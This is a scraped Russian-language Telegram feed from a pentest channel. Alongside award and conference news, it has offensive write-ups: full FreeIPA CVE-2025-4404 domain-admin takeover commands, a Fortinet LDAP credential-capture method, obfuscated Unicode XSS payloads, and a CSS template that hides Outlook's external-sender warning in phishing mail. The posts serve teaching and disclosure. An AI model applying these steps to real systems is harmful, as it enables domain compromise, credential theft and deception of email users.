GigaHackers
2.59K subscribers
97 photos
3 videos
10 files
80 links
Информация предоставлена исключительно в образовательных или исследовательских целях. Противоправные деяния преследуются по закону.
Авторы: @WILD_41, @Oki4_Doki и @VlaDriev
Download Telegram
[LPE Linux CVE-2025-32463]

Всем привет! 👋

На днях вышла информация об уязвимости CVE-2025-32463. Баг позволяет в результате манипуляции опцией sudo -R (--chroot) повысить привилегии до root. 🚨

Нам удалось подтвердить PoC в нескольких версиях sudo.
1️⃣ На первом рисунке можете увидеть, что версия 1.9.14p2 подвержена уязвимости. Сначала от непривилегированного пользователя не могли смотреть каталог /root, а после эксплуатации спокойно смогли перечислить содержимое;

2️⃣ Аналогично на втором рисунке версия sudo 1.9.15p2 также подвержена уязвимости;

3️⃣А вот на третьем рисунке видно, что версия sudo 1.9.13p3 не подвержена недостатку, так как до версии 1.9.14 необходимой функциональности не было.

Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до 1.9.17.p1
Подробнее о ресерче и приложенном PoC-е можно почитать здесь

#linux #pentest #LPE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍53🦄1
[FreeIPA CVE-2025-4404]

Всем привет! 👋

Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.

Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.

Начальные условия:

🟡 Домен FreeIPA
🟡 root доступ на одном из узлов домена. (Кстати очень удачно вышло LPE, о котором писали в предыдущем посте)

🔴 Акцентирую внимание, что даже не нужен доступ к УЗ в домене. (root доступ на узле не то же самое, что УЗ в домене)

🔘 Этап 1. Достаем секреты с машины - keytab для запроса TGT

Обычно он лежит по пути /etc/krb5.keytab

Чтобы убедиться, что keytab принадлежит машине можно сделать


klist -k /etc/krb5.keytab


Там должно быть что-то типа такого host/client.test.local@TEST.LOCAL

🔘 Этап 2. Получение TGT

Копируем полученный keytab себе на машину по тому же пути /etc/krb5.keytab и потом выполняем команды:

kinit -k host/client.test.local
klist


🔘 Этап 3. Подмена krbCanonicalName в LDAP

Вся соль начинается здесь:
⚫️ У машинной УЗ есть право менять krbCanonicalName. Но проблема даже не в этом.
⚫️ Когда атрибут изменяется - никто не проверяет, существует ли уже объект с таким именем в LDAP. Поэтому машина может сделать себе krbCanonicalName = admin@TEST.LOCAL.
⚫️ При запросе TGT, если атрибут krbCanonicalName у принципала существует, то билет будет выдан на его имя. (В идеальном мире он совпадает с krbPrincipalName)

Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:


dn: fqdn=client.test.local,cn=computers,cn=accounts,dc=test,dc=local
changetype: modify
replace: krbCanonicalName
krbCanonicalName: admin@TEST.LOCAL


Применяем:


ldapmodify -Y GSSAPI -H ldap://ipa.test.local -f change_canonical.ldif


🔘 Этап 4. Получение TGT уже с именем admin@TEST.LOCAL


kinit -k host/client.test.local
klist


Видим что-то типа: Default principal: admin@TEST.LOCAL

🔘 Этап 5. Доступ по SSH на DC как admin через Kerberos


ssh admin@ipa.test.local
whoami


В результате получаем полноценный доступ от администратора в домене.

Рекомендации:
🟣 Установить обновления безопасности CVE-2025-4404
🟣Подробности в официальных источниках

Все манипуляции были проведены на стенде FreeIPA версии 4.6.8

@GigaHack

#pentest #freeipa #infra #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍84🌭1🦄1
[ Итоги Bug Bounty за Q2 2025 ]

Всем привет! 👋

Недавно подвели топ Исследователей за прошедший квартал на BI.ZONE Bug Bounty.
Мне по итогам 2-го квартала 2025 г. удалось залететь в топ-3 по количеству принятых отчетов, а также в топ-5 по начисленному рейтингу (по выплатам я далеко не в топе, но всё впереди 🔝)

Впечатления мега-приятные, результатом я более чем доволен, ведь ещё относительно недавно я делился первыми успехами тут и тут, а сейчас разделил топ с сильнейшими и именитыми хантерами платформы @bizone_bb.


Далее напишу несколько тезисов и некоторую статистику по итогам этих результатов:

➡️ Стал ли я считать себя крутым web-ером?
Скорее нет, но однозначно у меня повысилась насмотренность, я стал узнавать некоторые технические решения/используемые паттерны с полувзгляда и подбирать проверки, специфичные для конкретного стека на лету. Также в целом прокачался и выстроил некий план проверок под себя, потому что удалось пощупать веб-сервисы разных вендоров после многих крутых Исследователей, где нужно иногда мыслить шире, а не обкладываться в лоб условным dirsearch-ем и иным fuzzing-ом вслепую


➡️Теперь статистика:
Активно хантил я с 9 мая и до 26 июня, за это время сдал 22 подтвержденных репорта (1 из репортов зачелся в Q2 будучи отправленным ещё в марте). Программы 50/50 были приватными/публичными

Хантил я преимущественно черным ящиком (не использовал симку с номером тел. и практически нигде не регистрировал личный кабинет через почту). Тут могу отметить, что даже на поверхности находятся баги и весьма неплохие. Да, в среднем это low-medium находки, но свой кусочек пирога можно урвать, если внимательно исследовать и то, что лежит на поверхности функциональности до авторизации даже после десятков сданных отчетов от других багхантеров

Заметил интересный факт, о котором говорили многие хантеры независимо друг от друга: для 80% моих багов я даже не открывал Burp 😈.
Очень "прокачался" в связке DevTools Mozilla 🖼️ + Google-Dorking🔎 + curl = валидная бага 🪙. Для многих задач этого было более чем достаточно

Был приятно удивлен триажем как от самих вендоров, так и от первичного триажа @bizone_bb. Порадовала и скорость, и фактура (были информы, куда без них, но с адекватным обоснованием), за всё время только по одному репорту встретил на мой взгляд непонимание статуса info, так как буквально в соседней программе на том же стеке этой же баге был присвоен статус low/medium, и триажил это вроде бы один человек. Но меня это не напрягало, бага в любом случае была минорной.
Также было приятно быстро получать фидбэк по нескольким возникшим вопросам по работе самой платформы от Руководителя продукта, это здорово

В процессе этого хантинга наткнулся на 2-3 необычных уязвимости бизнес-логики, но словил дубликат, причем они меня не расстроили, а наоборот добавили мотивации. Их я воспринял как мысль:"О, круто, я смотрю в нужном направлении, работаем дальше".

А info отчеты я перестал воспринимать близко к сердцу — просто решил, что нужно продолжать хантить и прокачивать навыки.
Важно грамотно и лаконично описывать импакт — на мой взгляд это показывает и Ваш уровень как специалиста, так и уважение к Вендору/Триажеру, ведь всегда приятно читать понятный, структурированный и аккуратно оформленный отчет.
У меня иногда на формирование отчета уходило достаточно много времени, однако 1 раз это явно принесло свои плоды — первичный info превратился в medium, так как я предложил рассмотреть вектор под другим углом и сам докрутил багу (показал альтернативную возможность эксплуатации)

Пост получается большим, поэтому если у Вас есть вопросы по хантингу — пишите в комментариях, с удовольствием отвечу!
В будущих постах планирую рассказать больше о технике, используемых инструментах и методологии поисков багов с моей стороны. Плюсом продолжим делиться интересными кейсами, которые выстреливают на BB, оставайтесь с нами👨‍💻

@GigaHack

#web #bug_bounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥133🦄1
[ CVE-2024-32122 FortiOS ]

Всем привет! 👋

Недавно мы с @VlaDriev зарегистрировали CVE, которая встречается в различных устройствах и продуктах Fortinet.

Процесс регистрации немного затянулся, багу закинули вендору еще весной 2024 года. Нам сразу же ответили и подтвердили наличие уязвимости, но вот исправить ее смогли только спустя год.

Эта уязвимость позволяет получить учетные данные от LDAP в открытом виде. Злоумышленнику нужно лишь частично изменить конфигурацию коннектора.

Для эксплуатации нам нужно знать пароль от уязвимого устройства линейки Fortinet. Казалось бы — уязвимость минорная, да ещё мол и пароль привилегированной УЗ надо достать, чтобы поковыряться в конфигурациях. И Вы будете правы с данными тезисами, но давайте взглянем на проблему комплексно.

➡️ Во-первых, ярким примером таких устройств, конечно, являются МФУ: многие внутрянщики знают, что принтеры являются лакомым куском для атакующих, но не одними принтерами едины. Уязвимыми также могут быть CMS, камеры, сетевое оборудование и многие другие устройства.🚨
➡️ Во-вторых, проблема в том, что такие устройства не живут в инфраструктурах в вакууме, а сконфигурированы в связке с какими-то сервисами.

Приведем пример: настроили МФУ, чтобы оно могло отправлять сообщения по SMTP на почту, также настроили аутентификацию по LDAP, чтобы загружался список контактов, а еще — SMB, чтобы сразу можно было складывать отсканированные файлы на сетевую шару.

На практике, попав в консоль управления такого устройства, мы можем менять IP-адрес коннектора на подконтрольный нам. Таким образом, нам достаточно поднять responder в режиме анализа и получить clear-text или хэш указанных учетных данных.

И всё-таки, доступ же надо как-то получить к этим конфигурациям? Да, но на практике многие устройства подвержены ряду недостатков/уязвимостей:

▪️УД по умолчанию — база на принтерах.
▪️IDOR (выделен отдельно от уязвимостей, потому что встречается часто).
▪️Также часто выстреливают какие-то XXE/Path traversal уязвимости, позволяющие достать содержимое конфига.

И как мы уже сказали выше — эти устройства не живут сами по себе, а на практике интегрированы в доменную инфраструктуру, в частности, в Active Directory.
Получив УЗ мы можем сразу делать relay на LDAP, на центр сертификации (AD CS) и вот мы уже в шаге от доменного администратора или как минимум можем залутать валидную доменную УЗ и собирать дальше информацию о домене.

Здесь надо понимать, что особенно во внутреннем периметре всё очень хрупкое и часто получается выстроить цепочку атак. Поэтому мелочей здесь не бывает, и даже low-баги по шкале CVSS могут выстроиться в крутую цепочку повышения привилегий и вывести вас в дамки.

Какой итог? Подходить к вопросам безопасности любой инфраструктуры надо комплексно, ни один реальный хакер не будет ограничиваться ТЗ/строгим скоупом ресурсов, как часто это бывает на пентестах. Он будет искать любую зацепку для компрометации ваших IT-активов. Будьте грамотны и смотрите на вопросы безопасности с разных сторон

@GigaHack

#internal #pentest #AD #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍8💯2🦄2
[ GigaHackers в шорт-листе премии pentest award ]

Всем привет, друзья! 👋

На днях опубликовали шорт-лист номинантов премии pentest award от Awillix.

Наши кейсы не остались в стороне в этом году, попали в шорт-лист по следующим номинациям:
➡️Пробив WEB
@VlaDriev и я вместе с ним (совместная работа двух GigaHacker-ов 🔥🎆)

➡️«**ck the logic»
@Oki4_Doki (ето я)

➡️«Ловись рыбка»
@Oki4_Doki (ето я)

➡️ «Out of Scope»
Снова @VlaDriev (в тройке с нашими друзьями-коллегами. Очень интересная для сообщества этичных хакеров работа!)

Также приятно видеть в списке очень много знакомых и сильных специалистов ⚡️

P/S в том году @VlaDriev и @WILD_41 попали в шорт-лист, а Влад занял 2 место в номинации "девайс". Посмотрим, сможем ли в этом году также попасть в тройку, награждение состоится уже совсем скоро 1 августа в 18:30 по Мск. 👉 Трансляция мероприятия будет доступна по ссылке.

#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥196👍4👎1🦄1
[ Итоги премии pentest award ]

Друзья, всем привет! 👋

Недавно прошла церемония награждения премии Pentest award 2025 ▶️
В этом году GigaHackers укрепили свои позиции:

@VlaDriev занял 3 место вместе с нашими друзьями-коллегами @Levatein, @N4m3U53r в номинации "Out of scope" с ресерчем BloodHoundIPA - ребята сделали fork популярного инструмента BloodHound для анализа доменов Active Directory и адаптировали его под домены на базе FreeIPA ⚡️

Чуть позже выпустим на канале отдельный пост про инструмент с обзором и нюансами 🏇

Мне же удалось занять 2 место в номинации "Hack the logic" за поиск логических уязвимостей. В кейсе смог реализовать уязвимость в платежной логике: осуществил реальное списание денежных средств клиента по поддельным данным + мог массово генерировать чеки об оплате, тем самым исчерпывая свободное место на файловом хранилище организации.

Помимо этого хотим также поздравить наших коллег и товарищей с призовыми местами:
@s0i37_channel с 2 местом в номинации "Out of scope" с работой "Google в локалке".
@Alevuc с 2 местом в номинации "Ловись рыбка" с работой "Когда CRM — твой враг, а телеграм зло во плоти"

С остальными результатами и итогами можете ознакомиться 👉 тут.
Большое спасибо организаторам, все было как всегда на высочайшем уровне! Обязательно будем принимать участие в следующем году.

@GigaHack

#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22🏆10👍52🤮1
[ Интернациональные XSS ]

Всем привет! 👋

Собрали для Вас необычную подборку "обфусцированных" XSS-like пейлоадов на разных языках🔥

XSS по-армянски 🇦🇲

ա="",բ=!ա+ա,գ=!բ+ա,դ=ա+{},ե=բ[ա++],զ=բ[է=ա],ը=++է+ա,թ=դ[է+ը],
բ[թ+=դ[ա]+(բ.գ+դ)[ա]+գ[ը]+ե+զ+բ[է]+թ+ե+դ[ա]+զ][թ](գ[ա]+գ[է]+բ[ը]+զ+ե+"('GigaHackers Ձեզ հարձակվել են')")()


XSS по-русски 🇷🇺

а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а],
з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('GigaHackers '+ document.domain)")()


XSS по-китайски 🇨🇳

甲='',乙=!甲+甲,丙=!乙+甲,丁=甲+{},戊=乙[甲++],己=乙[庚=甲],
辛=++庚+甲,壬=丁[庚+辛],
乙[壬+=丁[甲]+(乙.丙+丁)[甲]+丙[辛]+戊+己+乙[庚]+壬+戊+丁[甲]+己][壬](
丙[甲]+丙[庚]+乙[辛]+己+戊+"('GigaHackers 受到攻击')"
)()


На самом деле вся "магия" заключается в том, что в JavaScript имена переменных могут содержать не только привычную латиницу, но и символы в Unicode (в том числе символы из различных алфавитов).
А сама нагрузка здесь представляет собой конкатенацию строк + преобразование типов, которая собирается в вызов Function("alert('GigaHackers_text')")()

Здесь в очередной раз хочется напомнить, что зачастую много интересных техник можно реализовать штатными средствами, если внимательно изучить документацию/RFC и иные справки используемой технологии.
Изучайте технологии фундаментально, не спешите, читайте man, и перед вами откроются новые двери🔍

@GigaHack

#xss #obfuscation #web
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20👍7😁5🤡4👎2
[Подкаст «Метод хакера»]

Всем привет!
👋

Летом прошла запись подкаста «Метод хакера», где я выступил экспертом. Сегодня выпуск доступен к прослушиванию на разных площадках 💬🎵💬🎵.

Мы провели детальный разбор пентеста с точки зрения инструмента защиты инфраструктуры. Несколько ключевых вопросов выпуска:

➡️ Что скрывается за термином «пентест» и зачем он нужен?
➡️ Можно ли доверять сторонним специалистам по пентесту или лучше держать специалистов внутри компании?
➡️ Какие инструменты используют пентестеры?
➡️ Как автоматизировать пентесты на уровне отдельного исполнителя и в масштабах инфраструктуры компании?

Спасибо за приглашение поучаствовать в проекте! Простым языком обсудили пентесты и их автоматизацию как на уровне отдельного исполнителя, так и в масштабах инфраструктуры компании. Подкаст будет понятен и полезен всем - профессионалам и начинающим.


Слушать выпуск «Лучшая защита – нападение. А автонападение – еще лучше».

@GigaHack

#gigahack #pentest #talk
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍51💅1
[ Когда Outlook перестает сомневаться ]

Всем привет! 👋

В последнее время кампании по социальной инженерии все больше осложняются надстроенными средствами защиты. Одним из часто встречаемых механизмов является плашка в Outlook о внешнем отправителе. Думаю, многие коллеги, работающие с корпоративной почтой, не раз видели огромный алерт желто-красного цвета на пол письма с предупреждением о письме с внешнего доменного имени. Такая сигнализация резко повышает бдительность конечных пользователей, которых пытаются фишить.

Однако с этим механизмом защиты есть нюанс. Недавно мы писали пост об "интернациональных XSS". Главный месседж в нем был в понимании фундаментальных основ. В этом посте я в очередной раз подсвечу, что иногда решение проблемы в offensive-индустрии может скрываться на поверхности и не требовать программирования на ассемблере с бубном в руках.

Если мы сохраним письмо от "внешнего отправителя" как формат HTML в клиенте outlook-а, то увидим, что технически всё наше письмо и является HTML-кодом, в который была вставлена плашка в тело письма с сообщением, настроенным на Exchange-сервере администраторами (рис. 1).

Но раз мы рассылаем письма, значит под нашим контролем всё содержимое HTML-письма, которое мы направляем и корректируем. А для обхода всплывающего содержимого нам достаточно вспомнить CSS и его возможности: попробуем запретить отображение всего кроме нашей легенды письма с помощью магии CSS:

<html>
<head>
<style type="text/css">

body {
display: none !important;
background:#FFFFFF !important;
}
.id100500 {
display: block !important;
}
div[style] {
display: none !important;
background:#FFFFFF !important;
}
p {
display: none !important;
background:#FFFFFF !important;
}
p[style] {
display: none !important;
background:#FFFFFF !important;
}
span {
display: none !important;
background: #FFFFFF !important;
}
span[style] {
display: none !important;
background:#FFFFFF !important;
}
table[style] {
display: none !important;
background:#FFFFFF !important;
}
table {
display: none !important;
background:#FFFFFF !important;
}
td {
display: none !important;
background:#FFFFFF !important;
}
td[style] {
display: none !important;
background:#FFFFFF !important;
}
tr {
display: none !important;
background:#FFFFFF !important;
}
tr[style] {
display: none !important;
background:#FFFFFF !important;
}
tbody {
background:#FFFFFF !important;
display: none !important;
}
tbody[style] {
display: none !important;
background:#FFFFFF !important;
}
</style>
</head>
<body>
<p class="id100500">Привет!</p>
<p class="id100500">Это обманка </p>
</body>
</html>


Здесь мы всё красим в белый кроме своего уникального class=id100500.
На рис.2 пример отправки письма без указанных CSS-стилей, а на рис.3 уже с применением нашей хитрости.

P/S стоит отметить, что в окне предпросмотра клиента Outlook-а текст с алертом всё ещё будет виден, если администраторы настроили вставку плашки в начало сообщения (рис. 4). Но тем не менее сама плашка визуально не отображается, и в потоке писем это может дать нам очки бонуса, как атакующим.
В фишинговых кампаниях мелочей не бывает, важны детали и любые нюансы. И если даже одна эта деталь сможет снизить бдительность сотрудника, то фишинговую кампанию можно будет считать успешной.

Об этой технике известно как минимум с 19-21 годов, более развернутое описание вы можете посмотреть тут, а приложенный PoC тут.

Таким образом, если ты понял правила игры, то можешь их адаптировать под себя

@GigaHack

#social #outlook #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23👍91💘1
[ BUGS ZONE 6.0 ]

Всем привет! 👋

Не так давно выступил с небольшим докладом на приватном мероприятии для багхантеров от BI.ZONE Bug Bounty 🪲
Интересный опыт выступления в камерном сообществе перед рядом сильнейших хантеров. Приятно удивлен, что часть людей задавала вопросы после выступления как лично на ивенте, так и в ЛС (хотя сам свой доклад оцениваю больше для начинающих).
Также теперь мой ник 1 из 38 "увековеченных" участников ивента на плакате😎
Приятная мелочь, так как помню о первых багах и посещение BUGS 3 ещё в качестве гостя, а не хантера

Спасибо @BIZONE_BB и вендорам за приглашение в приватки, а победителей поздравляю с попаданием в топ-5, вы круты!
Был рад пообщаться со старыми товарищами и познакомиться с новыми людьми в комьюнити!🔝

@GigaHack

#bug_bounty #bugs_zone6 #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍43💋1
[SOC Forum 2025]

А пока я выступал на BUGS — @VlaDriev готовился к выступлению на SOC Forum 2025.
Старт доклада уже скоро 👋

Приглашаем вас послушать доклад "Автоматизация рутины пентеста и почему мало кто так делает".

📆 20.11.2025 в 11:00 Мск, зал 4.
Трансляция здесь. 🚀

➡️ Проект за проектом, год за годом в процессе проведения пентеста приходится выполнять достаточно много рутинных действий. Это не только утомляет, но и неизбежно приводит к ошибкам, которые могут негативно повлиять на ИТ-инфраструктуру заказчика.

➡️ В рамках доклада мы расскажем о своем опыте автоматизации рутины пентеста, проблемах, с которыми столкнулись, особенностях известных инструментов (Masscan, NetExec, Impacket, NTLM Relay и других), а также о том, как тестировали полученные решения.

@GigaHack

#pentest #soc_forum2025 #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍9🦄1